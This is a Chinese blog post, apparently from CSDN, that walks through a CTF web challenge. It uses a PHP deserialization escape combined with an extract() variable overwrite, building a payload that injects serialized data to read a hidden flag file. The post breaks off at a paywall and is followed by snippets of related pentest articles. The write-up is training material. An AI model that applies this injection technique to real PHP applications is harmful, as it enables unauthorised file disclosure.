渗透测试练习题解析 5(CTF web)

原创 已于 2024-04-01 23:49:27 修改 · 1.4k 阅读 · 12 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#前端 #网络安全 #web安全 #安全 #网络攻击模型 #计算机网络 #安全威胁分析

于 2024-04-01 23:44:38 首次发布

1、[安洵杯 2019]easy_serialize_php 1

考点:PHP 反序列化逃逸 + 变量覆盖

【代码审计】

通过 GET 的方式获取参数 f 的值,传递给变量 function

定义一个过滤函数,过滤掉特定字符(用空字符替换)

下面的代码其实没什么用,应该是干扰,对做题没影响

extract () 函数从数组中将变量导入到当前的符号表。

该函数使用数组键名作为变量名,使用数组键值作为变量值。针对数组中的每个元素,将在当前符号表中创建对应的一个变量。该函数存在变量覆盖漏洞,我们只需要从新传递变量的值就可以将原来的覆盖掉。

变量覆盖漏洞_extract变量覆盖漏洞-优快云博客

这里就是我们刚进去的页面,当 $function 为空值的时候输出该跳转链接

通过 img_path 的值来为 $_SESSION['img'] 传递指定的值,加上 $_SESSION['img'] 在 extract () 后面,导致我们无法直接为其赋值

对 $_SESSION 进行序列化然后再进行敏感字符过滤,这会导致反序列化逃逸

代码通过判断参数 f 的值来输出指定文件,当 f=highlight_file 就输出 index.php 文件的内容到页面,其他的一样

根据代码的提示,我们构造 f=phpinfo ,然后寻找敏感信息,最终找到一个文件名,猜测 flag 应该在其中

值得注意的是

如果 f=show_image ,那么就会对前面序列化的字符串进行反序列化,然后再进过一次 base64 解码,高亮解码后的文件

【解题思路】

经过前面代码的分析,解题思路就有了。

序列化的时候是对下面三个变量同时序列化的

$_SESSION["user"] = 'guest';

$_SESSION['function'] = $function;

$_SESSION['img']=base64_encode('guest_img.png');

而前两个变量是可以通过变量覆盖漏洞进行修改的

$_SESSION["user"] = 'guest';

$_SESSION['function'] = $function;

由于该题对字符串过滤是先序列化再过滤再反序列化,存在反序列化逃逸,我们可以通过对前两个变量的构造从而实现对 img 的赋值

正常情况下来讲,该代码序列化的过程

<?php
$_SESSION["user"] = 'guest';
$_SESSION['function'] = 'show_image';
$_SESSION['img'] = 'guest_img.php';

echo serialize($_SESSION);

?>
a:3:{s:4:"user";s:5:"guest";s:8:"function";s:10:"show_image";s:3:"img";s:13:"guest_img.php";}

我们需要把 img 的值改成 d0g3_f1ag.php 经过 base64 编码后的字符串,因为在高亮函数数会经过一次解码所以传进去的必须提前编码好

d0g3_f1ag.php   ----- base64 -----> ZDBnM19mMWFnLnBocA==

我们修改一下$_SESSION['function']、$_SESSION['img'] 的值【注意:这里只是为构造 payload 而测试的,并不是直接改题目中 $_SESSION['img'] 的值,那个是改不了的】

(变量值写 a 只是为了方便计算)

<?php
$_SESSION["user"] = 'guest';
$_SESSION['function'] = 'a';
$_SESSION['img'] = 'ZDBnM19mMWFnLnBocA==';

echo serialize($_SESSION);

?>
a:3:{s:4:"user";s:5:"guest";s:8:"function";s:1:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

反序列化逃逸,如果经过过滤后,键值的字符减少了(但是原本长度是不会变的),他就会向后读取对应的字符数补到和原长度一样,我们截取这么一段

a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

<?php
$_SESSION["user"] = 'flagflagflagflagflagflag';
$_SESSION['function'] = 'a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}';
$_SESSION['img'] = 'ZDBnM19mMWFnLnBocA==';

echo serialize($_SESSION);

?>

序列化后

a:3:{s:4:"user";s:24:"flagflagflagflagflagflag";s:8:"function";s:42:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

经过过滤,flag 全部被过滤掉,先后取 24 为补足长度,所以 ";s:8:"function";s:42:"a 就变成了 user 的值,";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";} 在花括号外面,会被忽略掉

a:3:

最低0.47元/天 解锁文章
渗透测试练习题解析 4(CTF web
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
02-18 2117
这个其实挺难想到的,开始我也没想到,看了大佬 wp 才知道,因为前面有个地方干扰到我了,这一串我前面试了很多又是解码又是转图片转文件都没解出来,我以为这个位置的数据没什么用,导致后面没去理这块地方(没猜错的话应该是这个熊猫图的编码,不过不知道为什么转码转不出来)来查看当前目录所有文件名,但是 scandir('.') 包含参数了,不符合条件,所以需要使用别的函数来替代。),使其满足三个 if 条件中的一个,从而执行 $flag 得到 flag,而不是说要绕过三个 if ,去执行最后一行代码,这是不现实的。
学习笔记 渗透练习(简单服务器渗透)
qq_52360932的博客
01-19 1762
运用虚拟机、蚁剑、CobaltStrike等对服务器进行渗透练习
渗透测试练习靶场hackthebox_Oopsie
qq_45951598的博客
03-31 2341
文章目录扫描路径泄露登录升级shell权限提升后续总结 扫描 根据给出的IP地址,使用nmap进行扫描 nmap -sS -F -sV 10.10.10.28 -sS:半开扫描,Nmap发送SYN包到远程主机,不建立完整的三次握手 -F:快速扫描,扫描一些常用端口 -sV:探测开启的端口来获取服务、版本信息 如图所示,发现其开放了22和80端口,接下来我们用浏览器进入网站(10.10.10.28:80)进行检查 路径泄露 方法一 这里他说要登入,但是我们这里不知道登入口在哪 发现可以登录,但是目前没有
渗透测试练习题解析 7 (CTF web
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
10-29 2040
1、PHP 短标签2、``符号的使用通过代码可知 check 是一个过滤函数,利用正则的方式过滤掉 空格、php、eval 等一些关键字或符号,$dir 是路径,这个值可以通过 action=pwd 获取到,也就是说获取到的文件内容会通过 file_put_contents 这个函数写入到 $dir/index.php 中。;> 可以成功写入,这个 相当于echo?,空格杯过滤了用%09或者\t代替??=`ls\t/`?
渗透练习 Vulnhub靶场 Nemesis
hljzzj的博客
02-15 2033
No.28 Nemesis 靶机信息 下载地址: https://www.vulnhub.com/entry/ia-nemesis-101,582/ 靶场: VulnHub.com 靶机名称: IA: Nemesis (1.0.1) 难度: 中等-困难 发布时间: 2020年10月25日 提示信息: 这个盒子是为了提高Linux特权升级和CMS技能而创建的,我希望你们喜欢。 目标: 2个flag 实验环境 攻击机:VMware kali 192.168.7.3 靶机:Vbox linux IP自
渗透测试练习题解析 1(CTF web
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
01-08 1443
简单来说waf就是防火墙,用来保护网页信息,它对其中一种恶意注入方式sql注入的防护方式如下:1、严格限制Web应用的数据库的操作权限,给此用户提供仅仅能够满足其工作的最低权限,从而最大限度的减少注入攻击对数据库的危害。2、检查输入的数据是否具有所期望的数据格式,
精选资源
CTF竞赛杂项题目练习(六):涵盖远控木马分析Web漏洞利用、CTF加密挑战及解题思路总结
最新发布
04-20
内容概要:本文档《MISC-杂项题目练习(六)》详细记录了作者在bugku平台上的解题思路与步骤,涵盖从第41题到第49题的内容。其中包括远控木马分析,通过netstat命令获取控制端IP和端口;Web漏洞挖掘,利用Python脚本...
CTF web安全45天入门学习路线
热门推荐
b1ackc4t的博客
01-23 1万+
前言 因为最近在准备开发CTF学习平台,先做一个学习路线的整理,顺便也是对想学web的学弟学妹的一些建议。 学习路线 初期 刚刚走进大学,入了web安全的坑,面对诸多漏洞必然是迷茫的,这时的首要任务就是打好网站开发的基础,曾有伟人说过-“自己不会做网站,何谈去找网站的漏洞”,在学习漏洞前,了解基本网站架构、基础网站开发原理,基础的前后端知识,能够让你之后的漏洞学习畅通无阻。 html+css+js(2-3天) 前端三要素 html、css、js是被浏览器解析的代码,是构成静态页面的基础。也是前端漏洞如xss
100道渗透测试工程师面试题(附答案)
jennycisp的博客
04-03 2442
2024年已经快过去一半了,不知道小伙伴们有没有找到自己心仪的工作呀。最近后台收到不少小伙伴说要我整理一下渗透测试的面试题,今天它来了!
CTF-Horizontall HackTheBox渗透测试(一)
ALLEN'Blog
01-29 439
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。同时每个成长路线对应的板块都有配套的视频提供:当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
网络渗透测试实验四-CTF实践(WebDeveloper靶机渗透)
YatKTm的博客
12-06 4407
文章目录前言实验目的系统环境实验工具实验原理:1、什么是CTF1.1 CTF竞赛模式(1)解题模式(Jeopardy)(2)攻防模式(Attack-Defense)(3)混合模式(Mix)1.2 CTF各大题型简介MISC(安全杂项)PPC(编程类)CRYPTO(密码学)STEGA(隐写)PWN(溢出)WEBweb类)实验步骤和内容:目的基本思路实现过程:1、发现目标 (netdiscover),找到WebDeveloper的IP地址。2、利用NMAP扫描目标主机,发现目标主机端口开放、服务情况,截图并说
简单的练习渗透测试的方法(真的很简单)
caption88的博客
12-01 1823
首先渗透测试就是传说的黑客选手。砸门现在开始教程(文中涉及很多下载链接,本人就是使用这个链接,所以我也不知道有没有中毒,不过既然要做这一行,砸门不是已经被黑就是在被黑的路上。所以没有关系啦) 第一步:虽然我们不能确定自己被没有被黑,或者我们安装的软件是否有毒的情况下,砸门先开一个保护的东西再说:比如360,或者电脑管家,或者知名公司旗下的产品。知名公司例如:知道创宇,360,绿盟等。我反正...
渗透测试靶机练习-DC-1 实战
飞鱼的企鹅的博客
06-15 4580
第一次深入的了解靶机,下面把我做题的整个流程写在下面,仅供参考 靶机介绍 我所用的靶机是在vulnhub上下载的,网址如下 https://www.vulnhub.com/?page=1 里面有许多靶机可以供我们练习,我之后也将会花很多时间去练习,来提高自己的技术。对DC-1的介绍如下 大概意思啊是这个靶机需要你获得root权限,并找到所有的5个flag 入侵靶机 DC-1下载好之后,可以在VM...
渗透测试面试题汇总(全)
2401_88752684的博客
11-06 1693
这样攻击者就有了偷听主机传输的数据的可能。在数据库使用了宽字符集而WEB中没考虑这个问题的情况下,在WEB层,由于0XBF27是两个字符,在PHP中比如addslash和magic_quotes_gpc开启时,由于会对0x27单引号进行转义,因此0xbf27会变成0xbf5c27,而数据进入数据库中时,由于0XBF5C是一个另外的字符,因此\转义符号会被前面的bf带着"吃掉",单引号由此逃逸出来可以用来闭合语句。绕过:使用不同协议,针对IP,IP格式的绕过,针对URL,恶意URL增添其他字符,@之类的。
红日靶场--内网渗透练习
Nailaoyyds的博客
04-21 4453
环境介绍: 内网 kali 192.168.171.137 win7 192.168.171.153 192.168.52.130 win2003 192.168.52.131 win2008 192.168.52.138 信息收集 内网主机存...
渗透小白的打靶细致练习
baimaozi008的博客
06-19 872
利用vm直接打开就OK了,建议设置为nat执行命令:nmap -sP -T 5 192.168.20.205/24执行命令:nmap -A -T 5 192.168.20.205无法登陆,先不爆破,去github上看看有没有探测joomla的脚本在kali中下载https://github.com/OWASP/joomscan.git探测网站进入下载目录:cd /root/Downloads/joomscan-master。
渗透测试练习靶场hackthebox——Starting Point Pathfinder攻略(详细版本)
weixin_42109829的博客
09-08 4932
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
gmailc2:一款基于Google SMTP的完全无法检测的C2服务器
qq_53058639的博客
07-24 1680
1、持久化;2、支持Shell访问;3、查看系统信息;4、…
渗透入门必练靶场,零基础入门到精通(超详细),收藏这一篇就够了!
Cairo_A的博客
12-02 743
相信很多小伙伴们在学习渗透测试的时候,不知道如何开始,那么这下面13个靶场对你的学习将会有很大的帮助!
深入解析CTF杂项练习题:挑战信息安全的极限
资源摘要信息:"web渗透-CTF杂项练习题" 本资源集合了多种类型的CTF(Capture The Flag,即“夺旗赛”)网络安全竞赛中的杂项练习题目,每种题型都代表了信息安全领域中的一个细分技能或知识点。CTF竞赛通常涵盖了...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值